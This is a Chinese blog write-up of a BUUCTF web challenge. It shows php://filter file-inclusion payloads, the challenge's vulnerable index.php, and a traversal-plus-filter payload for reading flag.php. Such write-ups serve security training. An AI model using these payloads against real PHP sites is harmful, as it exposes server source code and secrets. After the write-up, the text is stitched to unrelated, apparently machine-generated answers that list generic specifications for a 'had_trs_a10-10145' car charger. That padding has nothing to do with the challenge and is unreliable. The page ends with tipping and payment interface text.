buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

先看一下题目

这里上面有注入点,这里怀疑是SQL注入

先尝试读取一下index.php

这里使用php伪协议

payload:

php://filter:/convert.base64-encode/resource=index.php


存在文件包含漏洞,但是这里报错了,分析之后是无法打开流:操作失败

这里去除php后缀

payload

php://filter/convert.base64-encode/resource=index

解码之后找到index.php

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category参数必须有woofers,meowers,index才行

这里构造payload来包含flag.php

/index.php?category=woofers/../flag

那如何去获取flag.php的内容呢

这里使用的知识点是php://filter伪协议套协议

payload:

/index.php?category=php://filter/convert.base64-encode/index/resource=flag

base64解码

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
### 回答1: had_trs_a10-10145 had车载充电机设计开发要求如下: 1. 输入电压:12V DC-28V DC; 2. 输出电压:5V DC; 3. 最大输出电流:2A; 4. 各种保护功能需齐全,包括过压保护、过流保护和短路保护等; 5. 外壳材料需能够承受高温和较大冲击; 6. 设计时需充分考虑并防止电磁干扰; 7. 充电器应具有良好的耐用性和稳定性,能够在常规使用条件下长期可靠运行; 8. 设计要尽量减小尺寸和重量,始终保持经济实用; 9. 应具备方便安装和操作的特性。 ### 回答2: had_trs_a10-10145 had车载充电机设计开发要求来源于一个对于车载充电机制作和应用的需要。该要求主要分为以下几个方面: 首先,对于车载充电机的基本参数有明确的要求。这些基本参数包括输入电压范围、输出电压和电流、工作温度范围、额定功率等。这些参数的规定是为了保证车载充电机在实际使用过程中可以正常、高效地工作,满足用户的基本需求。 其次,需要根据车辆型号等因素,进行适配和定制化设计。不同车辆的电气系统和外观尺寸等因素可能存在很大差异,因此对车载充电机的适配和定制化要求较高。在设计过程中需要考虑到车载充电机的体积、重量、接口类型等因素,使其能够与车辆的电气系统和外观完美匹配,达到最佳工作状态。 第三点,对于车载充电机的安全性、稳定性等特性也有着严格的要求。车载充电机是直接接触车辆电源的设备,对其的安全性和稳定性要求极高。在设计过程中要考虑功率因数、防护等级、过压、过流、过温等安全措施的设计,以确保用户使用过程中兑现操作方便、安全,毫无后顾之忧。 综合来说,had_trs_a10-10145 had车载充电机设计开发要求的主要目的是在为用户提供高效、安全、稳定的车载充电器的同时,可以根据不同的车辆型号等要求,提供定制化的设计和适配服务,提高车载充电器的适用性和市场竞争力。 ### 回答3: had_trs_a10-10145是一款针对had车载系统的充电机。在设计和开发这款产品时,需要遵守以下几个要求: 1. 整机安全性能高:充电机作为有电性能的设备,必须在设计时注重安全性能,确保用户使用时不会因为安全问题引发意外事件。 2. 高效、快速充电:had车载系统日常使用需要足够大的续航能力,因此充电机需要支持快速充电和高效充电模式,能够快速为车载电池充电。 3. 确保充电质量:充电机需要确保充电质量,在充电时能够正确识别电池类型和充电状态,对电池进行适当的充电控制,从而确保充电电路的稳定性和电池寿命。 4. 兼容性好:充电机需要支持多种类型的电池充电,能够适应各种充电场景,兼容不同品牌、不同规格的电池。 5. 设计紧凑便携:车载充电机需要尽可能的考虑其体积和重量,尽可能的精简和压缩充电机的尺寸,在保证性能的同时使她更加便携和方便。 6. 防水设计:车载充电机将用于户外应用,在工作环境十分恶劣,亟需防水设计,确保充电机在恶劣工作环境中始终保持良好的工作状态。 综上述,had_trs_a10-10145车载充电机的设计和开发需要注重它的安全性、充电效率、充电质量、兼容性、重量和防水等方面,这些要求将直接影响到充电机的使用效果和用户体验,因此需要认真研究和开发。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值